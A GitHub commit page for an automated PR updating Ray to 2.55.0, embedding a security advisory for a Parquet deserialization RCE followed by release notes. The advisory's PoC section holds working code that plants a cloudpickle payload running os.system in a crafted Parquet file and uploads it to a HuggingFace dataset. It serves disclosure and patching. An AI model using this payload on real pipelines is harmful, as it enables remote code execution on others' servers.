Skip to content

Commit 69b3fc6

Browse files
Update dependency ray to v2.55.0 [SECURITY] - abandoned (#7629)
> ℹ️ **Note** > > This PR body was truncated due to platform limits. This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [ray](https://redirect.github.com/ray-project/ray) | `2.54.0` → `2.55.0` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/ray/2.55.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/ray/2.54.0/2.55.0?slim=true) | --- > [!WARNING] > Some dependencies could not be looked up. Check the [Dependency Dashboard](../issues/357) for more information. --- ### Ray: Remote Code Execution via Parquet Arrow Extension Type Deserialization [CVE-2026-41486](https://nvd.nist.gov/vuln/detail/CVE-2026-41486) / [GHSA-mw35-8rx3-xf9r](https://redirect.github.com/advisories/GHSA-mw35-8rx3-xf9r) <details> <summary>More information</summary> #### Details ##### Remote Code Execution via Parquet Arrow Extension Type Deserialization ##### Summary Ray Data registers custom Arrow extension types (`ray.data.arrow_tensor`, `ray.data.arrow_tensor_v2`, `ray.data.arrow_variable_shaped_tensor`) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls `__arrow_ext_deserialize__` on the field's metadata bytes. Ray's implementation passes these bytes directly to `cloudpickle.loads()`, achieving arbitrary code execution during schema parsing, before any row data is read. In May 2024, Ray fixed a related vulnerability in `PyExtensionType`-based extension types ([issue #&#8203;41314](https://redirect.github.com/ray-project/ray/issues/41314), [PR #&#8203;45084](https://redirect.github.com/ray-project/ray/pull/45084)). In July 2025, [PR #&#8203;54831](https://redirect.github.com/ray-project/ray/pull/54831) introduced `cloudpickle.loads()` into the replacement extension types' deserialization path, reintroducing the same class of vulnerability. Note: Source links in this report are pinned to the Ray 2.54.0 release commit (`48bd1f8fa4`) for stable line references. We also re-verified the same vulnerable code paths on current `master` as of March 17, 2026. ##### Details ##### Extension type registration Ray Data registers three Arrow extension types globally in PyArrow: ```python ##### python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605 pa.register_extension_type(ArrowTensorType((0,), pa.int64())) pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64())) pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0)) ``` Registration happens at module load time ([`__init__.py:94-95`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/__init__.py#L94-L95)), and any use of `ray.data` triggers it. Once registered, PyArrow automatically calls `__arrow_ext_deserialize__` whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources. ##### The code path to `cloudpickle.loads()` All three extension types inherit from `ArrowExtensionSerializeDeserializeCache`, whose `__arrow_ext_deserialize__` method ([`arrow.py:176-179`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L176-L179)) delegates to subclass methods that ultimately call `_deserialize_with_fallback()`: ```python ##### python/ray/data/_internal/tensor_extensions/arrow.py:84-96 def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"): """Deserialize data with cloudpickle first, fallback to JSON.""" try: # Try cloudpickle first (new format) return cloudpickle.loads(serialized) # <-- arbitrary code execution except Exception: # Fallback to JSON format (legacy) try: return json.loads(serialized) except json.JSONDecodeError: raise ValueError( f"Unable to deserialize {field_name} from {type(serialized)}" ) ``` The `serialized` bytes come directly from the Parquet file's field-level metadata (`ARROW:extension:metadata`) with no validation. `cloudpickle.loads()` is tried **first**, meaning a crafted payload will always be executed before the safe JSON fallback is reached. For `ArrowTensorType`, the call chain is: ``` __arrow_ext_deserialize__(cls, storage_type, serialized) # arrow.py:176 -> _arrow_ext_deserialize_cache(serialized, value_type) # arrow.py:178 -> _arrow_ext_deserialize_compute(serialized, value_type) # arrow.py:652 -> _deserialize_with_fallback(serialized, "shape") # arrow.py:653 -> cloudpickle.loads(serialized) # arrow.py:88 RCE ``` `ArrowTensorTypeV2` ([`arrow.py:679-680`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L679-L680)) and `ArrowVariableShapedTensorType` ([`arrow.py:1076-1077`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L1076-L1077)) follow the same pattern. ##### Why the existing mitigation doesn't help After issue [#&#8203;41314](https://redirect.github.com/ray-project/ray/issues/41314), Ray added `check_for_legacy_tensor_type()` in [`parquet_datasource.py:146-170`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/datasource/parquet_datasource.py#L146-L170) to block the old `PyExtensionType`-based tensor types: ```python ##### python/ray/data/_internal/datasource/parquet_datasource.py:146-170 def check_for_legacy_tensor_type(schema): """Check for the legacy tensor extension type and raise an error if found. Ray Data uses an extension type to represent tensors in Arrow tables. Previously, the extension type extended `PyExtensionType`. However, this base type can expose users to arbitrary code execution. To prevent this, we don't load the type by default. """ for name, type in zip(schema.names, schema.types): if isinstance(type, pa.UnknownExtensionType) and isinstance( type, pa.PyExtensionType ): raise RuntimeError(...) ``` This guard checks for `PyExtensionType` / `UnknownExtensionType`. It does **not** check for the currently-registered `ray.data.arrow_tensor` types, which are the ones that call `cloudpickle.loads()`. Additionally, the check runs after PyArrow has already deserialized the schema, so even if it checked for the current types, the code execution would have already occurred. ##### Outside Ray's documented threat model Ray's [security documentation](https://docs.ray.io/en/latest/ray-security/index.html) states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file. ##### Impact - **Affected versions**: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable `_deserialize_with_fallback` function with `cloudpickle.loads()` was introduced in commit `f6d21db1a4` ([PR #&#8203;54831](https://redirect.github.com/ray-project/ray/pull/54831), July 2025), first released in Ray 2.49.0. - **Affected configurations**: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including `ray.data.read_parquet()`, `pyarrow.parquet.read_table()`, `pandas.read_parquet()`, etc. - **Attacker prerequisites**: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a `ray.data.arrow_tensor` (or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users. - **CIA impact**: Arbitrary command execution as the Ray worker process user, resulting in full server compromise. - **Severity**: Critical ##### Attack scenarios 1. **HuggingFace datasets**: Ray's documentation [recommends](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face) reading Parquet datasets from HuggingFace using `ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem())`. Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column with `ray.data.arrow_tensor` metadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below). 2. **Multi-tenant ML platforms**: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context. 3. **Compromised data pipelines**: An upstream data producer writes Parquet files with crafted tensor column metadata. The payload survives because standard Parquet tools preserve extension metadata transparently. ##### PoC We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace. **Prerequisites:** Python 3.12+ and [uv](https://docs.astral.sh/uv/getting-started/installation/) (`curl -LsSf https://astral.sh/uv/install.sh | sh`). ##### PoC 1: Local file Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing. **1. Create the Parquet file:** ```bash cat > craft_parquet.py << 'SCRIPT' import cloudpickle import pyarrow as pa import pyarrow.parquet as pq COMMAND = "id > /tmp/ray-tensor-rce-proof" class Trigger: def __reduce__(self): return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",)) storage_type = pa.list_(pa.int64()) schema = pa.schema([ pa.field("tensor", storage_type, metadata={ b"ARROW:extension:name": b"ray.data.arrow_tensor", b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()), }), pa.field("id", pa.int64()), pa.field("text", pa.string()), ]) table = pa.Table.from_arrays([ pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type), pa.array([1, 2]), pa.array(["hello", "world"]), ], schema=schema) pq.write_table(table, "crafted.parquet") print("Created crafted.parquet") SCRIPT uv run --with 'cloudpickle,pyarrow' python craft_parquet.py ``` **2. Read it with Ray Data:** ```bash rm -f /tmp/ray-tensor-rce-proof uv run --with 'ray[data]' python -c " import ray.data ray.data.read_parquet('crafted.parquet') " cat /tmp/ray-tensor-rce-proof ##### Expected: output of 'id' — confirms code execution ``` ##### PoC 2: End-to-end via HuggingFace This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following [Ray's own documentation](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face). We uploaded a crafted Parquet file to a private HuggingFace dataset at [`antiproof/parquet-tensor-disclosure`](https://huggingface.co/datasets/antiproof/parquet-tensor-disclosure). The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access. **Upload script** (for reference, this is how we seeded the dataset): ```bash cat > upload_dataset.py << 'SCRIPT' ##### /// script ##### requires-python = ">=3.10" ##### dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"] ##### /// """Upload a crafted Parquet file to a HuggingFace dataset. Prerequisites: huggingface-cli login (with a write token) Usage: uv run upload_dataset.py <repo_id> <command> """ import sys, tempfile from pathlib import Path import cloudpickle, pyarrow as pa, pyarrow.parquet as pq from huggingface_hub import HfApi def build_parquet(output, command): class Trigger: def __reduce__(self): return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",)) storage_type = pa.list_(pa.int64()) schema = pa.schema([ pa.field("tensor", storage_type, metadata={ b"ARROW:extension:name": b"ray.data.arrow_tensor", b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()), }), pa.field("id", pa.int64()), pa.field("text", pa.string()), ]) table = pa.Table.from_arrays([ pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type), pa.array([1, 2]), pa.array(["hello", "world"]), ], schema=schema) pq.write_table(table, str(output)) repo_id, command = sys.argv[1], sys.argv[2] with tempfile.TemporaryDirectory() as tmpdir: parquet = Path(tmpdir) / "train.parquet" build_parquet(parquet, command) HfApi().upload_file( path_or_fileobj=str(parquet), path_in_repo="data/train.parquet", repo_id=repo_id, repo_type="dataset", ) print(f"Uploaded to https://huggingface.co/datasets/{repo_id}") SCRIPT ##### We ran: ##### uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof' ``` **Reproduce** (reads the dataset from HuggingFace, no local files needed): ```bash rm -f /tmp/ray-tensor-rce-proof HF_TOKEN=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 \ uv run --with 'ray[data],huggingface_hub' python -c " import ray.data from huggingface_hub import HfFileSystem ray.data.read_parquet( 'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet', filesystem=HfFileSystem(), ) " cat /tmp/ray-tensor-rce-proof ##### Expected: output of 'id' — confirms code execution via HuggingFace dataset ``` The token above is read-only. The dataset is private to prevent unintended exposure. ##### Suggested fix The extension metadata stores simple values (a shape tuple like `(3, 224, 224)` or an ndim integer). These do not require cloudpickle. 1. **Replace `cloudpickle.loads()` in `_deserialize_with_fallback()` with `json.loads()`.** The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gate `cloudpickle.loads()` behind an opt-in environment variable (following the pattern already established with `RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE`). 2. **Serialize new extension type metadata as JSON by default.** `json.dumps([3, 224, 224])` carries the same information as `cloudpickle.dumps((3, 224, 224))`, without the code execution risk. 3. **Add a security note to `read_parquet()` documentation** explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered. Please contact security@antiproof.ai with any questions about this disclosure policy or related security research. #### Severity - CVSS Score: 8.9 / 10 (High) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H` #### References - [https://github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r](https://redirect.github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r) - [https://github.com/advisories/GHSA-mw35-8rx3-xf9r](https://redirect.github.com/advisories/GHSA-mw35-8rx3-xf9r) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-mw35-8rx3-xf9r) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>ray-project/ray (ray)</summary> ### [`v2.55.0`](https://redirect.github.com/ray-project/ray/releases/tag/ray-2.55.0) [Compare Source](https://redirect.github.com/ray-project/ray/compare/ray-2.54.1...ray-2.55.0) #### Ray Data ##### 🎉 New Features - Add `DataSourceV2` API with scanner/reader framework, file listing, and file partitioning ([#&#8203;61220](https://redirect.github.com/ray-project/ray/issues/61220), [#&#8203;61615](https://redirect.github.com/ray-project/ray/issues/61615), [#&#8203;61997](https://redirect.github.com/ray-project/ray/issues/61997)) - Support GPU shuffle with `rapidsmpf` 26.2 ([#&#8203;61371](https://redirect.github.com/ray-project/ray/issues/61371), [#&#8203;62062](https://redirect.github.com/ray-project/ray/issues/62062)) - Add Kafka datasink, migrate to `confluent-kafka`, support `datetime` offsets ([#&#8203;60307](https://redirect.github.com/ray-project/ray/issues/60307), [#&#8203;61284](https://redirect.github.com/ray-project/ray/issues/61284), [#&#8203;60909](https://redirect.github.com/ray-project/ray/issues/60909)) - Add Turbopuffer datasink ([#&#8203;58910](https://redirect.github.com/ray-project/ray/issues/58910)) - Add 2-phase commit checkpointing with trie recovery and load method ([#&#8203;61821](https://redirect.github.com/ray-project/ray/issues/61821), [#&#8203;60951](https://redirect.github.com/ray-project/ray/issues/60951)) - Queue-based autoscaling policy integrated with task consumers ([#&#8203;59548](https://redirect.github.com/ray-project/ray/issues/59548), [#&#8203;60851](https://redirect.github.com/ray-project/ray/issues/60851)) - Enable autoscaling for GPU stages ([#&#8203;61130](https://redirect.github.com/ray-project/ray/issues/61130)) - Expressions: add `random()`, `uuid()`, `cast`, and map namespace support ([#&#8203;59656](https://redirect.github.com/ray-project/ray/issues/59656), [#&#8203;60695](https://redirect.github.com/ray-project/ray/issues/60695), [#&#8203;59879](https://redirect.github.com/ray-project/ray/issues/59879)) - Add support for Arrow native fixed-shape tensor type ([#&#8203;56284](https://redirect.github.com/ray-project/ray/issues/56284)) - Support writing tensors to tfrecords ([#&#8203;60859](https://redirect.github.com/ray-project/ray/issues/60859)) - Add `pathlib.Path` support to `read_*` functions ([#&#8203;61126](https://redirect.github.com/ray-project/ray/issues/61126)) - Add `cudf` as a `batch_format` ([#&#8203;61329](https://redirect.github.com/ray-project/ray/issues/61329)) - Allow `ActorPoolStrategy` for `read_datasource()` via `compute` parameter ([#&#8203;59633](https://redirect.github.com/ray-project/ray/issues/59633)) - Introduce `ExecutionCache` for streamlined caching ([#&#8203;60996](https://redirect.github.com/ray-project/ray/issues/60996)) - Support `strict=False` mode for `StreamingRepartition` ([#&#8203;60295](https://redirect.github.com/ray-project/ray/issues/60295)) - Port changes from lance-ray into Ray Data ([#&#8203;60497](https://redirect.github.com/ray-project/ray/issues/60497)) - Enable PyArrow compute-to-expression conversion for predicate pushdown ([#&#8203;61617](https://redirect.github.com/ray-project/ray/issues/61617)) - Add vLLM metrics export and Data LLM Grafana dashboard ([#&#8203;60385](https://redirect.github.com/ray-project/ray/issues/60385)) - Include logical memory in resource manager scheduling decisions ([#&#8203;60774](https://redirect.github.com/ray-project/ray/issues/60774)) - Add monotonically increasing ID support ([#&#8203;59290](https://redirect.github.com/ray-project/ray/issues/59290)) ##### 💫 Enhancements - Performance: cache `_map_task` args, heap-based actor ranking, actor pool map improvements ([#&#8203;61996](https://redirect.github.com/ray-project/ray/issues/61996), [#&#8203;62114](https://redirect.github.com/ray-project/ray/issues/62114), [#&#8203;61591](https://redirect.github.com/ray-project/ray/issues/61591)) - Optimize concat tables and PyArrow schema hashing ([#&#8203;61315](https://redirect.github.com/ray-project/ray/issues/61315), [#&#8203;62108](https://redirect.github.com/ray-project/ray/issues/62108)) - Reduce default `DownstreamCapacityBackpressurePolicy` threshold to 50% ([#&#8203;61890](https://redirect.github.com/ray-project/ray/issues/61890)) - Improve reproducibility for random APIs ([#&#8203;59662](https://redirect.github.com/ray-project/ray/issues/59662)) - Clamp batch size to fall within C++ 32-bit int range ([#&#8203;62242](https://redirect.github.com/ray-project/ray/issues/62242)) - Account for external consumer object store usage in resource manager budget ([#&#8203;62117](https://redirect.github.com/ray-project/ray/issues/62117)) - Make `get_parquet_dataset` configurable in number of fragments to scan ([#&#8203;61670](https://redirect.github.com/ray-project/ray/issues/61670)) - Consolidate schema inference and make all preprocessors implement `SerializablePreprocessorBase` ([#&#8203;61213](https://redirect.github.com/ray-project/ray/issues/61213), [#&#8203;61341](https://redirect.github.com/ray-project/ray/issues/61341)) - Disable hanging issue detection by default ([#&#8203;62405](https://redirect.github.com/ray-project/ray/issues/62405)) - Make execution callback dataflow explicit to prevent state leakage ([#&#8203;61405](https://redirect.github.com/ray-project/ray/issues/61405)) - Log `DataContext` in JSON format at execution start for traceability ([#&#8203;61150](https://redirect.github.com/ray-project/ray/issues/61150), [#&#8203;61428](https://redirect.github.com/ray-project/ray/issues/61428)) - Autoscaler: configurable traceback, Prometheus gauges, relaxed constraints ([#&#8203;62210](https://redirect.github.com/ray-project/ray/issues/62210), [#&#8203;62209](https://redirect.github.com/ray-project/ray/issues/62209), [#&#8203;61917](https://redirect.github.com/ray-project/ray/issues/61917), [#&#8203;61385](https://redirect.github.com/ray-project/ray/issues/61385)) - Add metrics for task scheduling time, output backpressure, and logical memory ([#&#8203;61192](https://redirect.github.com/ray-project/ray/issues/61192), [#&#8203;61007](https://redirect.github.com/ray-project/ray/issues/61007), [#&#8203;61436](https://redirect.github.com/ray-project/ray/issues/61436)) - Prevent operators from dominating entire shared object store budget ([#&#8203;61605](https://redirect.github.com/ray-project/ray/issues/61605)) - Eliminate generators to avoid intermediate state pinning ([#&#8203;60598](https://redirect.github.com/ray-project/ray/issues/60598)) - Default log encoding to UTF-8 on Windows ([#&#8203;61143](https://redirect.github.com/ray-project/ray/issues/61143)) - Remove legacy `BlockList`, `locality_with_output`, old callback API, PyArrow 9.0 checks ([#&#8203;60575](https://redirect.github.com/ray-project/ray/issues/60575), [#&#8203;61044](https://redirect.github.com/ray-project/ray/issues/61044), [#&#8203;62055](https://redirect.github.com/ray-project/ray/issues/62055), [#&#8203;61483](https://redirect.github.com/ray-project/ray/issues/61483)) - Upgrade to `pyiceberg` 0.11.0; cap `pandas` to <3 ([#&#8203;61062](https://redirect.github.com/ray-project/ray/issues/61062), [#&#8203;60406](https://redirect.github.com/ray-project/ray/issues/60406)) - Refactor logical operators to frozen dataclasses ([#&#8203;61059](https://redirect.github.com/ray-project/ray/issues/61059), [#&#8203;61308](https://redirect.github.com/ray-project/ray/issues/61308), [#&#8203;61348](https://redirect.github.com/ray-project/ray/issues/61348), [#&#8203;61349](https://redirect.github.com/ray-project/ray/issues/61349), [#&#8203;61351](https://redirect.github.com/ray-project/ray/issues/61351), [#&#8203;61364](https://redirect.github.com/ray-project/ray/issues/61364), [#&#8203;61481](https://redirect.github.com/ray-project/ray/issues/61481)) - Prevent aggregator head node scheduling ([#&#8203;61288](https://redirect.github.com/ray-project/ray/issues/61288)) - Add error for `local://` paths with a zero-resource head node ([#&#8203;60709](https://redirect.github.com/ray-project/ray/issues/60709)) ##### 🔨 Fixes - Fix RCE in Arrow extension type deserialization from Parquet ([#&#8203;62056](https://redirect.github.com/ray-project/ray/issues/62056)) - Fix `StreamingSplitDataIterator.schema()` ([#&#8203;62057](https://redirect.github.com/ray-project/ray/issues/62057)) - Fix `ParquetDatasource` handling of `FileSystemFactory.inspect` ([#&#8203;62065](https://redirect.github.com/ray-project/ray/issues/62065)) - Fix `read_parquet` file-extension filtering for versioned object-store URIs ([#&#8203;61376](https://redirect.github.com/ray-project/ray/issues/61376)) - Fix `wide_schema_pipeline_tensors` cloudpickle deserialization ([#&#8203;62149](https://redirect.github.com/ray-project/ray/issues/62149)) - Fix `OpBufferQueue` race condition ([#&#8203;60828](https://redirect.github.com/ray-project/ray/issues/60828)) - Fix scheduling metrics computation ([#&#8203;62031](https://redirect.github.com/ray-project/ray/issues/62031)) - Fix `OneHotEncoder` `max_categories` to use global top-k instead of per-partition ([#&#8203;60790](https://redirect.github.com/ray-project/ray/issues/60790)) - Fix `ReservationOpResourceAllocator` resource borrowing for `ActorPoolMapOperator` ([#&#8203;60882](https://redirect.github.com/ray-project/ray/issues/60882)) - Fix `DatabricksUCDatasource` `schema()` shadowing by schema string attribute ([#&#8203;61282](https://redirect.github.com/ray-project/ray/issues/61282)) - Fix `AliasExpr` structural equality to respect rename flag ([#&#8203;60711](https://redirect.github.com/ray-project/ray/issues/60711)) - Fix `_align_struct_fields` failure with unaligned scalar fields ([#&#8203;58364](https://redirect.github.com/ray-project/ray/issues/58364)) - Fix `min_scheduling_resources` fallback to `incremental_resource_usage` ([#&#8203;60997](https://redirect.github.com/ray-project/ray/issues/60997)) - Fix output backpressure unblocking sequence for terminal ops ([#&#8203;60798](https://redirect.github.com/ray-project/ray/issues/60798)) - Fix multi-input operator object store memory attribution ([#&#8203;61208](https://redirect.github.com/ray-project/ray/issues/61208)) - Fix reference cycle by moving to module scope ([#&#8203;61934](https://redirect.github.com/ray-project/ray/issues/61934)) - Fix autoscaler logging: reduce verbose output and move traceback to debug ([#&#8203;61989](https://redirect.github.com/ray-project/ray/issues/61989), [#&#8203;62126](https://redirect.github.com/ray-project/ray/issues/62126)) - Fix double counting `ref_bundle` + `input_files` ([#&#8203;61774](https://redirect.github.com/ray-project/ray/issues/61774)) - Replace `on_exit` hook with `__ray_shutdown__` to fix UDF cleanup race ([#&#8203;61700](https://redirect.github.com/ray-project/ray/issues/61700)) - Prevent `Limit` from getting pushed past `map_groups` ([#&#8203;60881](https://redirect.github.com/ray-project/ray/issues/60881)) - Propagate schema in empty `_shuffle_block` to fix `ColumnNotFound` in chained left joins ([#&#8203;61507](https://redirect.github.com/ray-project/ray/issues/61507)) - Fix unclear metadata warning and incorrect operator name logging ([#&#8203;61380](https://redirect.github.com/ray-project/ray/issues/61380)) - Clamp rolling utilization averages to zero ([#&#8203;61543](https://redirect.github.com/ray-project/ray/issues/61543)) - Fix floating point errors in `TimeWindowAverageCalculator` ([#&#8203;61580](https://redirect.github.com/ray-project/ray/issues/61580)) - Remove default task-level timeout and clamp `end_offset` in Kafka datasource ([#&#8203;61476](https://redirect.github.com/ray-project/ray/issues/61476)) - Avoid redundant reads in `train_test_split` ([#&#8203;60274](https://redirect.github.com/ray-project/ray/issues/60274)) - Return `None` when no outputs have been produced ([#&#8203;62029](https://redirect.github.com/ray-project/ray/issues/62029)) - Replace bare `raise` with `TypeError` in string concatenation ([#&#8203;60795](https://redirect.github.com/ray-project/ray/issues/60795)) ##### 📖 Documentation - Add job-level checkpointing documentation ([#&#8203;60921](https://redirect.github.com/ray-project/ray/issues/60921)) - Update `exclude_resources` docs for Train autoscaling changes ([#&#8203;61990](https://redirect.github.com/ray-project/ray/issues/61990)) - Add `locality_with_output` migration instructions ([#&#8203;61151](https://redirect.github.com/ray-project/ray/issues/61151)) - Document `max_tasks_in_flight_per_actor` vs `max_concurrent_batches` ([#&#8203;60477](https://redirect.github.com/ray-project/ray/issues/60477)) - Add missing `MOD` operation docs; improve `ray.data.Datasource` docs ([#&#8203;60803](https://redirect.github.com/ray-project/ray/issues/60803), [#&#8203;59654](https://redirect.github.com/ray-project/ray/issues/59654)) - Add `polars` usage instructions ([#&#8203;60029](https://redirect.github.com/ray-project/ray/issues/60029)) #### Ray Serve ##### 🎉 New Features: - Added end-to-end gRPC client and bidirectional streaming support, including public APIs, proxy handling, proto updates, and developer docs, so Serve apps can handle streaming workloads natively instead of building custom transport layers. ([#&#8203;60767](https://redirect.github.com/ray-project/ray/issues/60767), [#&#8203;60768](https://redirect.github.com/ray-project/ray/issues/60768), [#&#8203;60769](https://redirect.github.com/ray-project/ray/issues/60769), [#&#8203;60770](https://redirect.github.com/ray-project/ray/issues/60770), [#&#8203;60771](https://redirect.github.com/ray-project/ray/issues/60771)) - Introduced HAProxy-based serving with fallback proxy support and load-balancer tunables, giving operators a higher-throughput ingress path and more control over traffic behavior in production. ([#&#8203;60586](https://redirect.github.com/ray-project/ray/issues/60586), [#&#8203;61180](https://redirect.github.com/ray-project/ray/issues/61180), [#&#8203;61271](https://redirect.github.com/ray-project/ray/issues/61271), [#&#8203;61468](https://redirect.github.com/ray-project/ray/issues/61468), [#&#8203;61988](https://redirect.github.com/ray-project/ray/issues/61988)) - Added queue-based autoscaling for async inference and Taskiq-backed workloads, so scaling decisions can account for both HTTP in-flight load and queued tasks. ([#&#8203;59548](https://redirect.github.com/ray-project/ray/issues/59548), [#&#8203;60851](https://redirect.github.com/ray-project/ray/issues/60851), [#&#8203;60977](https://redirect.github.com/ray-project/ray/issues/60977), [#&#8203;61008](https://redirect.github.com/ray-project/ray/issues/61008)) - Rolled out gang scheduling support across validation, core scheduling, fault tolerance, downscaling, autoscaling, rolling updates, and migration, enabling coordinated multi-replica placement for tightly coupled workloads. ([#&#8203;60944](https://redirect.github.com/ray-project/ray/issues/60944), [#&#8203;61205](https://redirect.github.com/ray-project/ray/issues/61205), [#&#8203;61206](https://redirect.github.com/ray-project/ray/issues/61206), [#&#8203;61207](https://redirect.github.com/ray-project/ray/issues/61207), [#&#8203;61215](https://redirect.github.com/ray-project/ray/issues/61215), [#&#8203;61467](https://redirect.github.com/ray-project/ray/issues/61467), [#&#8203;61216](https://redirect.github.com/ray-project/ray/issues/61216), [#&#8203;61659](https://redirect.github.com/ray-project/ray/issues/61659)) - Introduced deployment-scoped actors with config/schema, lifecycle management, public API, and controller health checks, making it easier to run durable per-deployment sidecar-like logic inside Serve. ([#&#8203;61639](https://redirect.github.com/ray-project/ray/issues/61639), [#&#8203;61648](https://redirect.github.com/ray-project/ray/issues/61648), [#&#8203;61664](https://redirect.github.com/ray-project/ray/issues/61664), [#&#8203;61833](https://redirect.github.com/ray-project/ray/issues/61833), [#&#8203;62161](https://redirect.github.com/ray-project/ray/issues/62161)) ##### 💫 Enhancements: - Added first-class tracing support for Serve, including inter-deployment gRPC propagation and richer streaming-path attributes, improving end-to-end observability across distributed request flows. ([#&#8203;61230](https://redirect.github.com/ray-project/ray/issues/61230), [#&#8203;61089](https://redirect.github.com/ray-project/ray/issues/61089), [#&#8203;61451](https://redirect.github.com/ray-project/ray/issues/61451)) - Expanded operational metrics with replica utilization, richer error labeling, and client IP logging in access logs, helping teams diagnose bottlenecks and user-impacting issues faster. ([#&#8203;60758](https://redirect.github.com/ray-project/ray/issues/60758), [#&#8203;61092](https://redirect.github.com/ray-project/ray/issues/61092), [#&#8203;60967](https://redirect.github.com/ray-project/ray/issues/60967)) - Improved autoscaling extensibility with class-based policies and `policy_kwargs`, so advanced users can package reusable autoscaling logic without custom forks. ([#&#8203;60964](https://redirect.github.com/ray-project/ray/issues/60964)) - Reduced controller overhead with broad algorithmic improvements (indexing, cache reuse, and avoiding repeated per-tick work), which improves scalability as deployment and replica counts grow. ([#&#8203;60810](https://redirect.github.com/ray-project/ray/issues/60810), [#&#8203;60829](https://redirect.github.com/ray-project/ray/issues/60829), [#&#8203;60830](https://redirect.github.com/ray-project/ray/issues/60830), [#&#8203;60838](https://redirect.github.com/ray-project/ray/issues/60838), [#&#8203;60842](https://redirect.github.com/ray-project/ray/issues/60842), [#&#8203;60843](https://redirect.github.com/ray-project/ray/issues/60843), [#&#8203;60844](https://redirect.github.com/ray-project/ray/issues/60844), [#&#8203;60832](https://redirect.github.com/ray-project/ray/issues/60832), [#&#8203;60806](https://redirect.github.com/ray-project/ray/issues/60806)) - Improved throughput-oriented operation controls by adding environment-based tuning and explicit throughput optimization logging, making performance behavior easier to configure and audit. ([#&#8203;60757](https://redirect.github.com/ray-project/ray/issues/60757), [#&#8203;62146](https://redirect.github.com/ray-project/ray/issues/62146)) - Upgraded Serve internals to Pydantic v2 and refined time-series aggregation behavior for more predictable metric accuracy under high load. ([#&#8203;61061](https://redirect.github.com/ray-project/ray/issues/61061), [#&#8203;61403](https://redirect.github.com/ray-project/ray/issues/61403)) ##### 🔨 Fixes: - Fixed a direct-ingress shutdown bug where replicas could hang indefinitely while draining stuck requests, ensuring bounded shutdown behavior in failure scenarios. ([#&#8203;60754](https://redirect.github.com/ray-project/ray/issues/60754)) - Fixed HAProxy reliability issues, including config race conditions, draining guards, and platform compatibility edge cases, improving stability in production rollouts. ([#&#8203;61120](https://redirect.github.com/ray-project/ray/issues/61120), [#&#8203;60955](https://redirect.github.com/ray-project/ray/issues/60955)) - Fixed autoscaling correctness issues that could cause runaway scaling or delayed reactions, including feedback-loop regressions, streaming scale-down behavior, and wall-clock delay handling. ([#&#8203;61731](https://redirect.github.com/ray-project/ray/issues/61731), [#&#8203;61920](https://redirect.github.com/ray-project/ray/issues/61920), [#&#8203;62331](https://redirect.github.com/ray-project/ray/issues/62331), [#&#8203;61844](https://redirect.github.com/ray-project/ray/issues/61844), [#&#8203;60613](https://redirect.github.com/ray-project/ray/issues/60613)) - Fixed high-percentile latency regression in request routing and queue-length accounting, reducing tail-latency spikes under load. ([#&#8203;61755](https://redirect.github.com/ray-project/ray/issues/61755)) - Fixed replica-state and health-state edge cases during migration and ingress transitions, preventing false errors and 